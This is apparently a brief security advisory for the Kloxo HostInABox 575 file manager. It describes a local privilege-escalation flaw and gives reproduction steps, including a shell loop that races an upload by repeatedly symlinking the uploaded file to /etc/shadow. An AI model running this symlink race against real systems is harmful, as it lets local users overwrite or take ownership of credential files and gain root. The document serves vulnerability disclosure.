Kloxo HostInABox 575 - file manager PT II



DESCRIPTION


Local users can create new files, overwrite the contents of, and take ownership of any file on the box.



IMPACT


Local users could obtain root privileges.


1. Log into Kloxo
2. Click "File Manager"
3. Click "Upload" (upload a file called: test)
4. From the shell:


[user1@testing574 ~]$ while true ; do rm -f test ; ln -s /etc/shadow test ; done


5. Click "Upload"